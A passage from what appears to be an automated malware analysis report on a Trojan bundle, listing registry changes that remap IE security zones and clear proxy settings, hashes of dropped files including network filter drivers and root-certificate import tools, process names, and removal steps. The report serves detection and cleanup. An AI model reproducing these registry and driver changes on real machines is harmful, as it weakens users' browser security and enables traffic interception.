"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\crfilterdrv]
"Tag" = "10"
[HKLM\SOFTWARE\CashReminder]
"instid" = "iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "09 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 4C EA 4C 0D D9 83 98 8A 56 49 6F AA CE 7B F6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process CashReminder.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 92 EC 81 5A 8C 87 CA F7 BD 7B B4 FF 71 69 1F"
The process sc.exe:3420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 0A 7C 61 2F 5E 1B 7A 40 6F FD A7 72 9C 67 EE"
The process sc.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AA DC C5 15 43 95 4F B4 CB 0C 6C BA 0C 50 47"
The process GOSafer.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 0F 1C 07 20 99 82 DF C4 28 6A 2F C7 3F DD"
The process GOSafer.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "15"
[HKLM\SOFTWARE\GOSafer]
"instid" = "DjgSrxXMrVZd5ZDoXibWfcZQfB0nLdzw"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0E 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 E9 53 5B 15 46 BB 33 01 3B 58 18 1A C0 56 16"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process WNet.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\WNet]
"instid" = "ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D ED B9 45 D2 70 88 C1 67 43 28 77 A4 33 D4 B1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process WNet.exe:256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3B 94 1E FA 7E 1E A7 0E D1 C3 18 5A 1B 24 D6"
The process 310714_is.exe:1880 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A EF 9A 22 6A 05 20 0C 70 D5 52 F7 DD 85 01 85"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 93 74 AB 1E 03 C8 80 36 92 56 66 C3 DE 67 56"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup5755__9664.exe" = "amisetup5755__9664"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings so that all local web-nodes with no dots in their names, which are not assigned to any zone, are mapped to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings so that all web-nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
MD5 | File path |
---|---|
a5bfd6a87161d5dfa81cb5c2c6d29488 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\istartsurf\UninstallManager.exe |
a96619564071df84cc892752df062a6d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe |
3663b55452d8e814f62d6fae8eb32d65 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe |
f94557f8fd41731a3d180383a516fbe3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe |
1b99adddd28023e61c2a23c13cd855cf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe |
d61776c4928db339475ab6a773585c9d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe |
98c303ebdc2c29766000bc1bbb5e294b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe |
a111ca5040df2e52a27baebb40cdf8f1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\amisetup5755__9664.exe |
bbae2d7dac42f4ff6f172bb9ffe0d589 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp\nsWeb.dll |
c17103ae9072a06da581dec998343fc1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\System.dll |
d7a3fa6a6c738b4a3c40d5602af20b08 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\inetc.dll |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\nsWeb.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\registry.dll |
d61776c4928db339475ab6a773585c9d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe |
763cabe2b93e8a6ca951370ef5133e53 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] |
1b99adddd28023e61c2a23c13cd855cf | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe |
5dbd356bff7e0a10e80866df96d47a78 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe |
7a266046995398d1da3e6c3a98883bd0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] |
98c303ebdc2c29766000bc1bbb5e294b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe |
69bd671e58d7b29ea5493a880668a0e1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] |
62f09521fa1665b5dbf4dcc444f4584d | c:\Program Files\ActSys\ActSys.exe |
50c806e582580511a38980168445a60f | c:\Program Files\ActSys\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files\ActSys\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files\ActSys\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files\ActSys\nfregdrv.exe |
fb06f6889fe30a3effc5783ca305c59c | c:\Program Files\ActSys\remove_ActSys.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files\ActSys\ssleay32.dll |
072ce8611b64cad10923f3fae7e52eda | c:\Program Files\CashReminder\CashReminder.exe |
d68a76ab1ebbbdde37bb12bd68b1639d | c:\Program Files\CashReminder\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files\CashReminder\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files\CashReminder\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files\CashReminder\nfregdrv.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files\CashReminder\ssleay32.dll |
c7eb85d39abb42efdd7b6c87de25a1dc | c:\Program Files\CashReminder\uninstall.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files\GOSafer\ProtocolFilters.dll |
c1908176b417b29dcfcfc15d7de9de63 | c:\Program Files\GOSafer\gosafer.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files\GOSafer\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files\GOSafer\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\GOSafer\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\GOSafer\ssleay32.dll |
e5dc41a4c742155c1af960fdf5e51ed6 | c:\Program Files\GOSafer\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files\WNet\ProtocolFilters.dll |
45571677457a9bfd49aadada0fd91ca8 | c:\Program Files\WNet\WNet.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files\WNet\libeay32.dll |
8249371485714e1f45a4b1c67002cf47 | c:\Program Files\WNet\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files\WNet\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files\WNet\ssleay32.dll |
f5d2e26b10a2b23d534e16a24375b051 | c:\Program Files\WNet\uninst.exe |
2cf2d758fe1109d055e9857f95a73cf8 | c:\WINDOWS\system32\drivers\asfilterdrv.sys |
e28c3440574068ccc3948d9ed9f3a047 | c:\WINDOWS\system32\drivers\crfilterdrv.sys |
649ac45992f39d9a04f3d629a872bd5c | c:\WINDOWS\system32\drivers\gosaferdrv.sys |
278c3df1efa1e09c4e55e7ddc59ab519 | c:\WINDOWS\system32\drivers\ssfilterdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
